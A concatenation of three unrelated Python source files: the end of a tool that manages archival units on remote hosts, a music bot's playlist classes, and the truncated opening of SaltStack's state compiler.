group.add_option('--deactivate-aus', action='store_true', help='deactivate target AUs on target hosts')
group.add_option('--delete-aus', action='store_true', help='delete target AUs from target hosts')
group.add_option('--reactivate-aus', action='store_true', help='reactivate target AUs on target hosts')
parser.add_option_group(group)
# Output options
group = OptionGroup(parser, 'Output options')
group.add_option('--list-by-auid', action='store_true', help='list output by AUID')
group.add_option('--list-by-both', action='store_true', help='list output by both AU name and AUID (default)')
group.add_option('--list-by-name', action='store_true', help='list output by AU name')
group.add_option('--sort-by-auid', action='store_true', help='sort output by AUID')
group.add_option('--sort-by-name', action='store_true', help='sort output by AU name (default)')
group.add_option('--table-output', action='store_true', help='produce tabular output')
group.add_option('--text-output', action='store_true', help='produce text output (default)')
group.add_option('--verbose', action='store_true', default=False, help='make --text-output verbose (default: %default)')
parser.add_option_group(group)
# Job pool
group = OptionGroup(parser, 'Job pool')
group.add_option('--pool-size', metavar='SIZE', type='int', default=0, help='size of the job pool, 0 for unlimited (default: %default)')
group.add_option('--process-pool', action='store_true', help='use a process pool')
group.add_option('--thread-pool', action='store_true', help='use a thread pool (default)')
parser.add_option_group(group)
# Other options
group = OptionGroup(parser, 'Other options')
group.add_option('--batch-size', metavar='SIZE', type='int', default=100, help='size of AUID batches (default: %default)')
parser.add_option_group(group)
return parser
def __init__(self, parser, opts, args):
'''
Constructor.
Parameters:
- parser (OptionParser instance): the option parser
- opts (Options instance): the Options instance returned by the parser
- args (list of strings): the remaining command line arguments returned by
the parser
'''
super(_ContentConfigurationServiceOptions, self).__init__()
self.errors = 0
# Special options
if opts.copyright: print __copyright__
if opts.license: print __license__
if opts.tutorial: print __tutorial__
if any([opts.copyright, opts.license, opts.tutorial]): sys.exit()
# General checks
if len(args) > 0:
parser.error('unexpected command line arguments: %s' % (' '.join(args),))
if len(filter(None, [opts.add_aus, opts.deactivate_aus, opts.delete_aus, opts.reactivate_aus])) != 1:
parser.error('exactly one of --add-aus, --deactivate-aus, --delete-aus, --reactivate-aus is required')
if len(filter(None, [opts.table_output, opts.text_output])) > 1:
parser.error('at most one of --table-output, --text-output can be specified')
# hosts
self.hosts = opts.host[:]
for f in opts.hosts: self.hosts.extend(_file_lines(f))
if len(self.hosts) == 0: parser.error('at least one target host is required')
# auids
self.auids = opts.auid[:]
for f in opts.auids: self.auids.extend(_file_lines(f))
if len(self.auids) == 0: parser.error('at least one target AUID is required')
# au_operation
if opts.add_aus: self.au_operation = add_aus_by_id_list
elif opts.deactivate_aus: self.au_operation = deactivate_aus_by_id_list
elif opts.delete_aus: self.au_operation = delete_aus_by_id_list
else: self.au_operation = reactivate_aus_by_id_list
# table_output/text_output/keysort/keydisplay/verbose
self.table_output = opts.table_output
self.text_output = not self.table_output
if opts.sort_by_auid: self.keysort = _sort_by_auid
else: self.keysort = _sort_by_name # default is --sort-by-name
if opts.list_by_auid: self.keydisplay = _list_by_auid
elif opts.list_by_name: self.keydisplay = _list_by_name
else: self.keydisplay = _list_by_both # default is --list-by-both
if self.text_output:
self.verbose = opts.verbose
elif opts.verbose:
parser.error('--verbose can only be specified with --text-output')
# pool_class/pool_size/batch_size
if opts.process_pool and opts.thread_pool:
parser.error('--process-pool and --thread-pool are mutually exclusive')
self.pool_class = ProcessPool if opts.process_pool else ThreadPool
self.pool_size = opts.pool_size or len(self.hosts)
self.batch_size = opts.batch_size
# auth
u = opts.username or getpass.getpass('UI username: ')
p = opts.password or getpass.getpass('UI password: ')
self.auth = zsiauth(u, p)
# This is to allow pickling, so the process pool works, but this isn't great
# Have the sort and list params be enums and have keysort and keydisplay be methods?
def _sort_by_name(t): return t
def _sort_by_auid(t): return (t[1], t[0])
def _list_by_auid(t): return (t[1],) if t else ['AUID']
def _list_by_name(t): return (t[0],) if t else ['AU name']
def _list_by_both(t): return t if t else ['AU name', 'AUID']
def _do_au_operation_job(options_host):
options, host = options_host
data = dict()
errors = 0
for i in xrange(0, len(options.auids), options.batch_size):
result = options.au_operation(host, options.auth, options.auids[i:i+options.batch_size])
for r in result:
if r.IsSuccess: msg = None
else:
msg = (r.Message or '').partition(':')[0]
errors = errors + 1
data[((r.Name, r.Id), (host,))] = msg
return (host, data, errors)
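# _do_au_operation_job returns (host, data, errors); data maps ((AU name, AUID), (host,))
# to None on success, or to the leading part of the daemon's error message on failure.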
def _do_au_operation(options):
data = dict()
pool = options.pool_class(options.pool_size)
jobs = [(options, _host) for _host in options.hosts]
for host, result, errors in pool.imap_unordered(_do_au_operation_job, jobs):
data.update(result)
options.errors = options.errors + errors
if options.text_output:
for host in sorted(options.hosts):
            hostresults = [(k[0], v) for k, v in data.iteritems() if k[1] == (host,)]
if options.verbose:
successful = filter(lambda x: x[1] is None, hostresults)
if len(successful) > 0:
_output_record(options, ['Successful on %s:' % (host,)])
for x in sorted(successful, key=options.keysort):
_output_record(options, options.keydisplay(x[0]))
_output_record(options, [])
unsuccessful = filter(lambda x: x[1] is not None, hostresults)
if len(unsuccessful) > 0:
_output_record(options, ['Unsuccessful on %s:' % (host,)])
for x in sorted(unsuccessful, key=options.keysort):
_output_record(options, options.keydisplay(x[0]) + (x[1],))
_output_record(options, [])
else:
display = dict([((options.keydisplay(k[0]), k[1]), v) for k, v in data.iteritems()])
_output_table(options, display, options.keydisplay(None), [options.hosts])
# Last modified 2015-08-05
def _output_record(options, lst):
'''Internal method to display a single record.'''
print '\t'.join([str(x or '') for x in lst])
# Last modified 2016-05-16
def _output_table(options, data, rowheaders, lstcolkeys, rowsort=None):
'''Internal method to display tabular output. (Should be refactored.)'''
colkeys = [x for x in itertools.product(*lstcolkeys)]
for j in xrange(len(lstcolkeys)):
if j < len(lstcolkeys) - 1: rowpart = [''] * len(rowheaders)
else: rowpart = rowheaders
_output_record(options, rowpart + [x[j] for x in colkeys])
for rowkey in sorted(set([k[0] for k in data]), key=rowsort):
_output_record(options, list(rowkey) + [data.get((rowkey, colkey)) for colkey in colkeys])
# Last modified 2015-08-31
def _file_lines(fstr):
with open(os.path.expanduser(fstr)) as f: ret = filter(lambda y: len(y) > 0, [x.partition('#')[0].strip() for x in f])
if len(ret) == 0: sys.exit('Error: %s contains no meaningful lines' % (fstr,))
return ret
def _main():
'''Main method.'''
# Parse command line
parser = _ContentConfigurationServiceOptions.make_parser()
(opts, args) = parser.parse_args()
options = _ContentConfigurationServiceOptions(parser, opts, args)
# Dispatch
t = Thread(target=_do_au_operation, args=(options,))
t.daemon = True
t.start()
while True:
t.join(1.5)
if not t.is_alive(): break
# Errors
if options.errors > 0: sys.exit('%d %s; exiting' % (options.errors, 'error' if options.errors == 1 else 'errors'))
# Main entry point
if __name__ == '__main__': _main()
|
playlist.py
|
import json
import threading
import logging
import random
import time
import variables as var
from media.cache import (CachedItemWrapper, ItemNotCachedError,
get_cached_wrapper_from_dict, get_cached_wrapper_by_id)
from database import Condition
from media.item import ValidationFailedError, PreparationFailedError
def get_playlist(mode, _list=None, _index=None):
index = -1
if _list and _index is None:
index = _list.current_index
if _list is None:
if mode == "one-shot":
return OneshotPlaylist()
elif mode == "repeat":
return RepeatPlaylist()
elif mode == "random":
return RandomPlaylist()
elif mode == "autoplay":
return AutoPlaylist()
else:
if mode == "one-shot":
return OneshotPlaylist().from_list(_list, index)
elif mode == "repeat":
return RepeatPlaylist().from_list(_list, index)
elif mode == "random":
return RandomPlaylist().from_list(_list, index)
elif mode == "autoplay":
return AutoPlaylist().from_list(_list, index)
    raise ValueError("Unknown playlist mode: {}".format(mode))
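# A minimal usage sketch (illustrative; the wrapper items themselves are appended
# elsewhere through append()/extend()):
#   playlist = get_playlist("one-shot")                 # fresh playlist in one-shot mode
#   playlist = get_playlist("random", _list=playlist)   # switch mode, keeping the items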
class BasePlaylist(list):
def __init__(self):
super().__init__()
self.current_index = -1
self.version = 0 # increase by one after each change
self.mode = "base" # "repeat", "random"
self.pending_items = []
self.log = logging.getLogger("bot")
self.validating_thread_lock = threading.Lock()
def is_empty(self):
        return len(self) == 0
def from_list(self, _list, current_index):
self.version += 1
super().clear()
self.extend(_list)
self.current_index = current_index
return self
def append(self, item: CachedItemWrapper):
self.version += 1
super().append(item)
self.pending_items.append(item)
self.async_validate()
return item
def insert(self, index, item):
self.version += 1
if index == -1:
index = self.current_index
super().insert(index, item)
if index <= self.current_index:
self.current_index += 1
self.pending_items.append(item)
self.async_validate()
return item
def extend(self, items):
self.version += 1
super().extend(items)
self.pending_items.extend(items)
self.async_validate()
return items
def next(self):
if len(self) == 0:
return False
if self.current_index < len(self) - 1:
self.current_index += 1
return self[self.current_index]
else:
return False
def point_to(self, index):
if -1 <= index < len(self):
self.current_index = index
def find(self, id):
for index, wrapper in enumerate(self):
if wrapper.item.id == id:
return index
return None
def __delitem__(self, key):
return self.remove(key)
def remove(self, index):
self.version += 1
if index > len(self) - 1:
return False
removed = self[index]
super().__delitem__(index)
if self.current_index > index:
self.current_index -= 1
# reference counter
counter = 0
for wrapper in self:
if wrapper.id == removed.id:
counter += 1
if counter == 0:
var.cache.free(removed.id)
return removed
def remove_by_id(self, id):
to_be_removed = []
for index, wrapper in enumerate(self):
if wrapper.id == id:
to_be_removed.append(index)
if to_be_removed:
self.version += 1
            # remove from the end so earlier removals don't shift later indices
            for index in reversed(to_be_removed):
                self.remove(index)
def current_item(self):
if len(self) == 0:
return False
return self[self.current_index]
def next_index(self):
if self.current_index < len(self) - 1:
return self.current_index + 1
else:
return False
def next_item(self):
if self.current_index < len(self) - 1:
return self[self.current_index + 1]
else:
return False
def randomize(self):
        # current_index loses track of the current item after shuffling; instead of
        # pulling the current item out first (see the commented-out lines), we just reset the index.
# current = self.current_item()
# del self[self.current_index]
random.shuffle(self)
# self.insert(0, current)
self.current_index = -1
self.version += 1
def clear(self):
self.version += 1
self.current_index = -1
var.cache.free_all()
super().clear()
def save(self):
var.db.remove_section("playlist_item")
assert self.current_index is not None
var.db.set("playlist", "current_index", self.current_index)
for index, music in enumerate(self):
var.db.set("playlist_item", str(index), json.dumps({'id': music.id, 'user': music.user}))
def load(self):
current_index = var.db.getint("playlist", "current_index", fallback=-1)
if current_index == -1:
return
items = var.db.items("playlist_item")
if items:
music_wrappers = []
items.sort(key=lambda v: int(v[0]))
for item in items:
item = json.loads(item[1])
music_wrapper = get_cached_wrapper_by_id(item['id'], item['user'])
if music_wrapper:
music_wrappers.append(music_wrapper)
self.from_list(music_wrappers, current_index)
def _debug_print(self):
print("===== Playlist(%d) =====" % self.current_index)
for index, item_wrapper in enumerate(self):
if index == self.current_index:
print("-> %d %s" % (index, item_wrapper.format_debug_string()))
else:
print("%d %s" % (index, item_wrapper.format_debug_string()))
print("===== End =====")
def async_validate(self):
if not self.validating_thread_lock.locked():
            time.sleep(0.1)  # Brief pause so validation doesn't finish too quickly and free songs while something is still reading them.
th = threading.Thread(target=self._check_valid, name="Validating")
th.daemon = True
th.start()
def _check_valid(self):
self.log.debug("playlist: start validating...")
self.validating_thread_lock.acquire()
while len(self.pending_items) > 0:
item = self.pending_items.pop()
try:
item.item()
except ItemNotCachedError:
                # In some very subtle cases, items are removed and freed from
                # the playlist and the cache before validation even starts,
                # leaving the freed items in pending_items.
# Simply ignore these items here.
continue
self.log.debug("playlist: validating %s" % item.format_debug_string())
ver = item.version
try:
item.validate()
except ValidationFailedError as e:
self.log.debug("playlist: validating failed.")
if var.bot:
var.bot.send_channel_msg(e.msg)
var.cache.free_and_delete(item.id)
self.remove_by_id(item.id)
continue
if item.version > ver:
self.version += 1
self.log.debug("playlist: validating finished.")
self.validating_thread_lock.release()
class OneshotPlaylist(BasePlaylist):
def __init__(self):
super().__init__()
self.mode = "one-shot"
self.current_index = -1
def current_item(self):
if self.current_index == -1:
self.current_index = 0
return self[self.current_index]
def from_list(self, _list, current_index):
if len(_list) > 0:
if current_index > -1:
for i in range(current_index):
_list.pop(0)
return super().from_list(_list, 0)
return super().from_list(_list, -1)
return self
def next(self):
if len(self) > 0:
self.version += 1
if self.current_index != -1:
super().__delitem__(self.current_index)
if len(self) == 0:
return False
else:
self.current_index = 0
return self[0]
else:
self.current_index = -1
return False
def next_index(self):
if len(self) > 1:
return 1
else:
return False
def next_item(self):
if len(self) > 1:
return self[1]
else:
return False
def point_to(self, index):
self.version += 1
self.current_index = -1
for i in range(index):
super().__delitem__(0)
class RepeatPlaylist(BasePlaylist):
def __init__(self):
super().__init__()
self.mode = "repeat"
def next(self):
if len(self) == 0:
return False
if self.current_index < len(self) - 1:
self.current_index += 1
return self[self.current_index]
else:
self.current_index = 0
return self[0]
def next_index(self):
if self.current_index < len(self) - 1:
return self.current_index + 1
else:
return 0
def next_item(self):
return self[self.next_index()]
class RandomPlaylist(BasePlaylist):
def __init__(self):
super().__init__()
self.mode = "random"
def from_list(self, _list, current_index):
self.version += 1
random.shuffle(_list)
return super().from_list(_list, -1)
def next(self):
if len(self) == 0:
return False
if self.current_index < len(self) - 1:
self.current_index += 1
return self[self.current_index]
else:
self.version += 1
self.randomize()
self.current_index = 0
return self[0]
class AutoPlaylist(OneshotPlaylist):
def __init__(self):
super().__init__()
self.mode = "autoplay"
def refresh(self):
dicts = var.music_db.query_random_music(var.config.getint("bot", "autoplay_length", fallback=5),
Condition().and_not_sub_condition(
Condition().and_like('tags', "%don't autoplay,%")))
if dicts:
_list = [get_cached_wrapper_from_dict(_dict, "AutoPlay") for _dict in dicts]
self.from_list(_list, -1)
# def from_list(self, _list, current_index):
# self.version += 1
# self.refresh()
# return self
def clear(self):
super().clear()
self.refresh()
def next(self):
if len(self) == 0:
self.refresh()
return super().next()
|
state.py
|
# -*- coding: utf-8 -*-
"""
The State Compiler is used to execute states in Salt. A state is unlike
an execution module in that instead of just executing a command, it
ensures that a certain state is present on the system.
The data sent to the state calls is as follows:
{ 'state': '<state module name>',
'fun': '<state function name>',
'name': '<the name argument passed to all states>'
'argn': '<arbitrary argument, can have many of these>'
}
"""
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import copy
import datetime
import fnmatch
import logging
import os
import random
import re
import site
import sys
import time
import traceback
import salt.fileclient
# Import salt libs
import salt.loader
import salt.minion
import salt.pillar
import salt.syspaths as syspaths
import salt.transport.client
import salt.utils.args
import salt.utils.crypt
import salt.utils.data
import salt.utils.decorators.state
import salt.utils.dictupdate
import salt.utils.event
import salt.utils.files
import salt.utils.hashutils
import salt.utils.immutabletypes as immutabletypes
import salt.utils.msgpack
import salt.utils.platform
import salt.utils.process
import salt.utils.url
# Explicit late import to avoid circular import. DO NOT MOVE THIS.
import salt.utils.yamlloader as yamlloader
from salt.exceptions import SaltRenderError, SaltReqTimeoutError
# Import third party libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext import six
from salt.ext.six.moves import map, range, reload_module
from salt.serializers.msgpack import deserialize as msgpack_deserialize
from salt.serializers.msgpack import serialize as msgpack_serialize
from salt.template import compile_template, compile_template_str
from salt.utils.odict import DefaultOrderedDict, OrderedDict
# pylint: enable=import-error,no-name-in-module,redefined-builtin
log = logging.getLogger(__name__)
# These are keywords passed to state module functions which are to be used
# by salt in this state module and not on the actual state module function
STATE_REQUISITE_KEYWORDS = frozenset(
[
"onchanges",
"onchanges_any",
"onfail",
"onfail_any",
"onfail_stop",
"prereq",
"prerequired",
"watch",
"watch_any",
"require",
"require_any",
"listen",
]
)
STATE_REQUISITE_IN_KEYWORDS = frozenset(
["onchanges_in", "onfail_in", "prereq_in", "watch_in", "require_in", "listen_in"]
)
STATE_RUNTIME_KEYWORDS = frozenset(
[
"fun",
"state",
"check_cmd",
"failhard",
"onlyif",
"unless",
"retry",
"order",
"parallel",
"prereq",
"prereq_in",
"prerequired",
"reload_modules",
"reload_grains",
"reload_pillar",
"runas",
"runas_password",
"fire_event",
"saltenv",
"use",
"use_in",
"__env__",
"__sls__",
"__id__",
"__orchestration_jid__",
"__pub_user",
"__pub_arg",
"__pub_jid",
"__pub_fun",
"__pub_tgt",
"__pub_ret",
"__pub_pid",
"__pub_tgt_type",
"__prereq__",
]
)
STATE_INTERNAL_KEYWORDS = STATE_REQUISITE_KEYWORDS.union(
STATE_REQUISITE_IN_KEYWORDS
).union(STATE_RUNTIME_KEYWORDS)
def _odict_hashable(self):
return id(self)
OrderedDict.__hash__ = _odict_hashable
def split_low_tag(tag):
"""
Take a low tag and split it back into the low dict that it came from
"""
state, id_, name, fun = tag.split("_|-")
return {"state": state, "__id__": id_, "name": name, "fun": fun}
def _gen_tag(low):
"""
Generate the running dict tag string from the low data structure
"""
return "{0[state]}_|-{0[__id__]}_|-{0[name]}_|-{0[fun]}".format(low)
def _clean_tag(tag):
"""
Make tag name safe for filenames
"""
return salt.utils.files.safe_filename_leaf(tag)
def _l_tag(name, id_):
low = {
"name": "listen_{0}".format(name),
"__id__": "listen_{0}".format(id_),
"state": "Listen_Error",
"fun": "Listen_Error",
}
return _gen_tag(low)
def _calculate_fake_duration():
"""
Generate a NULL duration for when states do not run
but we want the results to be consistent.
"""
utc_start_time = datetime.datetime.utcnow()
local_start_time = utc_start_time - (
datetime.datetime.utcnow() - datetime.datetime.now()
)
utc_finish_time = datetime.datetime.utcnow()
start_time = local_start_time.time().isoformat()
delta = utc_finish_time - utc_start_time
# duration in milliseconds.microseconds
duration = (delta.seconds * 1000000 + delta.microseconds) / 1000.0
return start_time, duration
def get_accumulator_dir(cachedir):
"""
Return the directory that accumulator data is stored in, creating it if it
doesn't exist.
"""
fn_ = os.path.join(cachedir, "accumulator")
if not os.path.isdir(fn_):
# accumulator_dir is not present, create it
os.makedirs(fn_)
return fn_
def trim_req(req):
"""
Trim any function off of a requisite
"""
reqfirst = next(iter(req))
if "." in reqfirst:
return {reqfirst.split(".")[0]: req[reqfirst]}
return req
def state_args(id_, state, high):
"""
Return a set of the arguments passed to the named state
"""
args = set()
if id_ not in high:
return args
if state not in high[id_]:
return args
for item in high[id_][state]:
if not isinstance(item, dict):
continue
if len(item) != 1:
continue
args.add(next(iter(item)))
return args
def find_name(name, state, high):
"""
Scan high data for the id referencing the given name and return a list of (IDs, state) tuples that match
Note: if `state` is sls, then we are looking for all IDs that match the given SLS
"""
ext_id = []
if name in high:
ext_id.append((name, state))
# if we are requiring an entire SLS, then we need to add ourselves to everything in that SLS
elif state == "sls":
for nid, item in six.iteritems(high):
if item["__sls__"] == name:
ext_id.append((nid, next(iter(item))))
# otherwise we are requiring a single state, lets find it
else:
# We need to scan for the name
for nid in high:
if state in high[nid]:
if isinstance(high[nid][state], list):
for arg in high[nid][state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if arg[next(iter(arg))] == name:
ext_id.append((nid, state))
return ext_id
def find_sls_ids(sls, high):
"""
    Scan for all ids in the given sls and return them as a list of (name, state) tuples
"""
ret = []
for nid, item in six.iteritems(high):
try:
sls_tgt = item["__sls__"]
except TypeError:
if nid != "__exclude__":
log.error(
"Invalid non-dict item '%s' in high data. Value: %r", nid, item
)
continue
else:
if sls_tgt == sls:
for st_ in item:
if st_.startswith("__"):
continue
ret.append((nid, st_))
return ret
def format_log(ret):
"""
Format the state into a log message
"""
msg = ""
if isinstance(ret, dict):
# Looks like the ret may be a valid state return
if "changes" in ret:
# Yep, looks like a valid state return
chg = ret["changes"]
if not chg:
if ret["comment"]:
msg = ret["comment"]
else:
msg = "No changes made for {0[name]}".format(ret)
elif isinstance(chg, dict):
if "diff" in chg:
if isinstance(chg["diff"], six.string_types):
msg = "File changed:\n{0}".format(chg["diff"])
if all([isinstance(x, dict) for x in six.itervalues(chg)]):
if all([("old" in x and "new" in x) for x in six.itervalues(chg)]):
msg = "Made the following changes:\n"
for pkg in chg:
old = chg[pkg]["old"]
if not old and old not in (False, None):
old = "absent"
new = chg[pkg]["new"]
if not new and new not in (False, None):
new = "absent"
# This must be able to handle unicode as some package names contain
# non-ascii characters like "Français" or "Español". See Issue #33605.
msg += "'{0}' changed from '{1}' to '{2}'\n".format(
pkg, old, new
)
if not msg:
msg = six.text_type(ret["changes"])
if ret["result"] is True or ret["result"] is None:
log.info(msg)
else:
log.error(msg)
else:
# catch unhandled data
log.info(six.text_type(ret))
def master_compile(master_opts, minion_opts, grains, id_, saltenv):
"""
Compile the master side low state data, and build the hidden state file
"""
st_ = MasterHighState(master_opts, minion_opts, grains, id_, saltenv)
return st_.compile_highstate()
def ishashable(obj):
try:
hash(obj)
except TypeError:
return False
return True
def mock_ret(cdata):
"""
Returns a mocked return dict with information about the run, without
executing the state function
"""
# As this is expanded it should be sent into the execution module
# layer or it should be turned into a standalone loader system
if cdata["args"]:
name = cdata["args"][0]
else:
name = cdata["kwargs"]["name"]
return {
"name": name,
"comment": "Not called, mocked",
"changes": {},
"result": True,
}
class StateError(Exception):
"""
Custom exception class.
"""
class Compiler(object):
"""
Class used to compile and manage the High Data structure
"""
def __init__(self, opts, renderers):
self.opts = opts
self.rend = renderers
def render_template(self, template, **kwargs):
"""
Enforce the states in a template
"""
high = compile_template(
template,
self.rend,
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
**kwargs
)
if not high:
return high
return self.pad_funcs(high)
def pad_funcs(self, high):
"""
Turns dot delimited function refs into function strings
"""
for name in high:
if not isinstance(high[name], dict):
if isinstance(high[name], six.string_types):
                    # Is this a short state? It needs to be padded!
if "." in high[name]:
comps = high[name].split(".")
if len(comps) >= 2:
# Merge the comps
comps[1] = ".".join(comps[1 : len(comps)])
high[name] = {
# '__sls__': template,
# '__env__': None,
comps[0]: [comps[1]]
}
continue
continue
skeys = set()
for key in sorted(high[name]):
if key.startswith("_"):
continue
if not isinstance(high[name][key], list):
continue
if "." in key:
comps = key.split(".")
if len(comps) >= 2:
# Merge the comps
comps[1] = ".".join(comps[1 : len(comps)])
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
continue
high[name][comps[0]] = high[name].pop(key)
high[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
return high
def verify_high(self, high):
"""
Verify that the high data is viable and follows the data structure
"""
errors = []
if not isinstance(high, dict):
errors.append("High data is not a dictionary and is invalid")
reqs = OrderedDict()
for name, body in six.iteritems(high):
if name.startswith("__"):
continue
if not isinstance(name, six.string_types):
errors.append(
"ID '{0}' in SLS '{1}' is not formed as a string, but "
"is a {2}".format(name, body["__sls__"], type(name).__name__)
)
if not isinstance(body, dict):
err = "The type {0} in {1} is not formatted as a dictionary".format(
name, body
)
errors.append(err)
continue
for state in body:
if state.startswith("__"):
continue
if not isinstance(body[state], list):
errors.append(
"State '{0}' in SLS '{1}' is not formed as a list".format(
name, body["__sls__"]
)
)
else:
fun = 0
if "." in state:
fun += 1
for arg in body[state]:
if isinstance(arg, six.string_types):
fun += 1
if " " in arg.strip():
errors.append(
(
'The function "{0}" in state '
'"{1}" in SLS "{2}" has '
"whitespace, a function with whitespace is "
"not supported, perhaps this is an argument "
'that is missing a ":"'
).format(arg, name, body["__sls__"])
)
elif isinstance(arg, dict):
# The arg is a dict, if the arg is require or
# watch, it must be a list.
#
# Add the requires to the reqs dict and check them
# all for recursive requisites.
argfirst = next(iter(arg))
if argfirst in ("require", "watch", "prereq", "onchanges"):
if not isinstance(arg[argfirst], list):
errors.append(
(
"The {0}"
" statement in state '{1}' in SLS '{2}' "
"needs to be formed as a list"
).format(argfirst, name, body["__sls__"])
)
# It is a list, verify that the members of the
# list are all single key dicts.
else:
reqs[name] = {"state": state}
for req in arg[argfirst]:
if isinstance(req, six.string_types):
req = {"id": req}
if not isinstance(req, dict):
err = (
"Requisite declaration {0}"
" in SLS {1} is not formed as a"
" single key dictionary"
).format(req, body["__sls__"])
errors.append(err)
continue
req_key = next(iter(req))
req_val = req[req_key]
if "." in req_key:
errors.append(
(
"Invalid requisite type '{0}' "
"in state '{1}', in SLS "
"'{2}'. Requisite types must "
"not contain dots, did you "
"mean '{3}'?".format(
req_key,
name,
body["__sls__"],
req_key[: req_key.find(".")],
)
)
)
if not ishashable(req_val):
errors.append(
(
'Illegal requisite "{0}", '
"is SLS {1}\n"
).format(
six.text_type(req_val),
body["__sls__"],
)
)
continue
# Check for global recursive requisites
reqs[name][req_val] = req_key
# I am going beyond 80 chars on
# purpose, this is just too much
# of a pain to deal with otherwise
if req_val in reqs:
if name in reqs[req_val]:
if reqs[req_val][name] == state:
if (
reqs[req_val]["state"]
== reqs[name][req_val]
):
err = (
"A recursive "
"requisite was found, SLS "
'"{0}" ID "{1}" ID "{2}"'
).format(
body["__sls__"],
name,
req_val,
)
errors.append(err)
# Make sure that there is only one key in the
# dict
if len(list(arg)) != 1:
errors.append(
(
"Multiple dictionaries "
"defined in argument of state '{0}' in SLS"
" '{1}'"
).format(name, body["__sls__"])
)
if not fun:
if state == "require" or state == "watch":
continue
errors.append(
(
"No function declared in state '{0}' in" " SLS '{1}'"
).format(state, body["__sls__"])
)
elif fun > 1:
errors.append(
"Too many functions declared in state '{0}' in "
"SLS '{1}'".format(state, body["__sls__"])
)
return errors
def order_chunks(self, chunks):
"""
Sort the chunk list verifying that the chunks follow the order
specified in the order options.
"""
cap = 1
for chunk in chunks:
if "order" in chunk:
if not isinstance(chunk["order"], int):
continue
chunk_order = chunk["order"]
if chunk_order > cap - 1 and chunk_order > 0:
cap = chunk_order + 100
for chunk in chunks:
if "order" not in chunk:
chunk["order"] = cap
continue
if not isinstance(chunk["order"], (int, float)):
if chunk["order"] == "last":
chunk["order"] = cap + 1000000
elif chunk["order"] == "first":
chunk["order"] = 0
else:
chunk["order"] = cap
if "name_order" in chunk:
chunk["order"] = chunk["order"] + chunk.pop("name_order") / 10000.0
if chunk["order"] < 0:
chunk["order"] = cap + 1000000 + chunk["order"]
chunk["name"] = salt.utils.data.decode(chunk["name"])
chunks.sort(
key=lambda chunk: (
chunk["order"],
"{0[state]}{0[name]}{0[fun]}".format(chunk),
)
)
return chunks
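    # Illustrative effect (hypothetical chunks): explicit integer orders keep their value,
    # "first" becomes 0, unnumbered chunks get the running cap, "last" becomes
    # cap + 1000000, and name_order adds a fractional offset so expanded names stay in sequence.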
def compile_high_data(self, high):
"""
"Compile" the high data as it is retrieved from the CLI or YAML into
the individual state executor structures
"""
chunks = []
for name, body in six.iteritems(high):
if name.startswith("__"):
continue
for state, run in six.iteritems(body):
funcs = set()
names = []
if state.startswith("__"):
continue
chunk = {"state": state, "name": name}
if "__sls__" in body:
chunk["__sls__"] = body["__sls__"]
if "__env__" in body:
chunk["__env__"] = body["__env__"]
chunk["__id__"] = name
for arg in run:
if isinstance(arg, six.string_types):
funcs.add(arg)
continue
if isinstance(arg, dict):
for key, val in six.iteritems(arg):
if key == "names":
for _name in val:
if _name not in names:
names.append(_name)
continue
else:
chunk.update(arg)
if names:
name_order = 1
for entry in names:
live = copy.deepcopy(chunk)
if isinstance(entry, dict):
low_name = next(six.iterkeys(entry))
live["name"] = low_name
list(map(live.update, entry[low_name]))
else:
live["name"] = entry
live["name_order"] = name_order
name_order = name_order + 1
for fun in funcs:
live["fun"] = fun
chunks.append(live)
else:
live = copy.deepcopy(chunk)
for fun in funcs:
live["fun"] = fun
chunks.append(live)
chunks = self.order_chunks(chunks)
return chunks
def apply_exclude(self, high):
"""
Read in the __exclude__ list and remove all excluded objects from the
high data
"""
if "__exclude__" not in high:
return high
ex_sls = set()
ex_id = set()
exclude = high.pop("__exclude__")
for exc in exclude:
if isinstance(exc, six.string_types):
# The exclude statement is a string, assume it is an sls
ex_sls.add(exc)
if isinstance(exc, dict):
# Explicitly declared exclude
if len(exc) != 1:
continue
key = next(six.iterkeys(exc))
if key == "sls":
ex_sls.add(exc["sls"])
elif key == "id":
ex_id.add(exc["id"])
# Now the excludes have been simplified, use them
if ex_sls:
            # There are sls excludes, find the associated ids
for name, body in six.iteritems(high):
if name.startswith("__"):
continue
if body.get("__sls__", "") in ex_sls:
ex_id.add(name)
for id_ in ex_id:
if id_ in high:
high.pop(id_)
return high
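    # Illustrative __exclude__ entries handled above (shapes only, not taken from the docs):
    #   - "webserver.apache"    -> excluded as an SLS name
    #   - {"sls": "webserver"}  -> explicit SLS exclude
    #   - {"id": "apache"}      -> explicit ID exclude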
class State(object):
"""
Class used to execute salt states
"""
def __init__(
self,
opts,
pillar_override=None,
jid=None,
pillar_enc=None,
proxy=None,
context=None,
mocked=False,
loader="states",
initial_pillar=None,
):
self.states_loader = loader
if "grains" not in opts:
opts["grains"] = salt.loader.grains(opts)
self.opts = opts
self.proxy = proxy
self._pillar_override = pillar_override
if pillar_enc is not None:
try:
pillar_enc = pillar_enc.lower()
except AttributeError:
pillar_enc = six.text_type(pillar_enc).lower()
self._pillar_enc = pillar_enc
log.debug("Gathering pillar data for state run")
if initial_pillar and not self._pillar_override:
self.opts["pillar"] = initial_pillar
else:
# Compile pillar data
self.opts["pillar"] = self._gather_pillar()
# Reapply overrides on top of compiled pillar
if self._pillar_override:
self.opts["pillar"] = salt.utils.dictupdate.merge(
self.opts["pillar"],
self._pillar_override,
self.opts.get("pillar_source_merging_strategy", "smart"),
self.opts.get("renderer", "yaml"),
self.opts.get("pillar_merge_lists", False),
)
log.debug("Finished gathering pillar data for state run")
self.state_con = context or {}
self.load_modules()
self.active = set()
self.mod_init = set()
self.pre = {}
self.__run_num = 0
self.jid = jid
self.instance_id = six.text_type(id(self))
self.inject_globals = {}
self.mocked = mocked
def _gather_pillar(self):
"""
Whenever a state run starts, gather the pillar data fresh
"""
if self._pillar_override:
if self._pillar_enc:
try:
self._pillar_override = salt.utils.crypt.decrypt(
self._pillar_override,
self._pillar_enc,
translate_newlines=True,
renderers=getattr(self, "rend", None),
opts=self.opts,
valid_rend=self.opts["decrypt_pillar_renderers"],
)
except Exception as exc: # pylint: disable=broad-except
